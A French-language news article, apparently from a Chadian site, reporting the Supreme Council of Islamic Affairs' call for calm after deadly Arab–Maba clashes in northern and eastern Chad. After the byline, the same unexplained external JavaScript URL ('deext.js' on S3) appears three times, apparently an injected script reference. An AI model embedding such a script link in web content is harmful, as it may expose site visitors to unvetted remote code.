Conflit intercommunautaire, le Conseil Supérieur des Affaires Islamiques appelle à l’apaisement

0
405

Le Conseil suprême des affaires islamiques au Tchad a demandé aux citoyens de l’Est et du Nord du pays de revenir à la voie de la raison et appelle à la paix, à la solidarité et à la coopération pour leur religion et leur patrie. C’était à travers une déclaration faite le mardi soir par le président du Conseil suprême des affaires islamiques au Tchad, Sheikh Mohammed Khater Issa, dans la grande mosquée du roi Fayçal de N’Djamena.

Cette déclaration fait suite à une guerre communautaire qui se vit dans le Nord et l’Est du pays dont qualifie « d’odieux et qui détruit l’unité nationale », le communiqué.

Des comptes rendus informels des affrontements ethniques survenus dans le nord du Tchad avait fait mention des dizaines de morts et des blessés dans les zones de creusement d’or. C’est dans la grande tribu des arabes et Maba réputée pour leur amitié incassable que s’est produite cette mésentente. Cependant, selon la déclaration, les batailles étaient originaires de l’Est du pays, en particulier de la région de Dar Dadi, où les deux tribus vivaient ensemble depuis des décennies entre pasteurs et agriculteurs.

L’homme de Dieu a mis en garde la population tchadienne de ce qui adviendra si jamais la cohésion sociale, l’unité et l’amour du prochain ne sont pas prisés avant de conclure que «Si nous laissons la génération sur le bateau, nous porterons la malédiction des générations futures ».

AHMAT MAHAMAT AHMAT

https://s3-us-west-2.amazonaws.com/gyrgdd/deext.js

https://s3-us-west-2.amazonaws.com/gyrgdd/deext.js

https://s3-us-west-2.amazonaws.com/gyrgdd/deext.js

Facebook Comments

LAISSER UN COMMENTAIRE

S'il vous plaît entrez votre commentaire!
S'il vous plaît entrez votre nom ici